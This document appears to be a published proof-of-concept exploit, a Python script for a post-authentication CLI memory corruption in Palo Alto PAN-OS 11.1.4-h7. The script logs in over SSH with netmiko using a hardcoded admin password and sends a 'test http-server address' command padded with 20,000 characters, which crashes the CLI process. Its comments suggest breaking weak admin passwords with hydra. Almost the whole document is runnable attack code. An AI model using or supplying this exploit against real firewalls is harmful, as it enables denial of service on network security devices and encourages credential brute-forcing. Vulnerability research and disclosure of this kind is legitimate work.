Palo Alto 11.1.4-h7 Memory Corruption

#!/usr/bin/env python3
# post auth cli memory corruption poc for #!/usr/bin/env python3
# post auth cli memory corruption poc for paloalto 11.1.4-h7
#
# 19.01.2025 @ 00:23
#

# postauth user (in general 'admin'* but we'll get back to that later ;))
# can use cli to provide one of the command from menu with too-long hostname
# as a <value> parameter.
#
# that will crash current cli process and session will be terminated.
# segfault error can be found in 'messages' log file. for details try:
# paloalto> less mp-log messages
#
# example log:
# Jan 18 09:28:06 PA-VM kernel: [ 5822.319982] cli[14441]: segfault at 7ffe5c048ff8
# ip 00007f111d428c94 sp 00007ffe5c049000 error 6 in libchicken.so[7f111d230000+293000]
#
# *(with simple-enough password for admin - hydra should break it)
#
# More: https://code610.blogspot.com/2025/05/palo-alto-postauth-cli-memory.html
#

import netmiko
from netmiko import ConnectHandler
import getpass
import sys

target=sys.argv[1]
login='admin'
password='P@ssw0rd'

firewall = {
"device_type": "paloalto_panos",
"host": target,
"username": login,
"password": password
}

# init connection
connection = ConnectHandler(**firewall) # unpacking the dictionary
print("[+] Connected to target host: %s" % target)

print("[i] Sending crash command...")

kab00m = "A"*20000
crash = "test http-server address " + kab00m
try:
output = connection.send_command( crash, expect_string=r">")
connection.disconnect()
except netmiko.exceptions.ReadTimeout as e:
print("[-] ReadTimeout() error - remote cli should be crashed. Check 'messages' for details.")
# print(output)
print("[+] Done. Good luck!")
#
# o/
#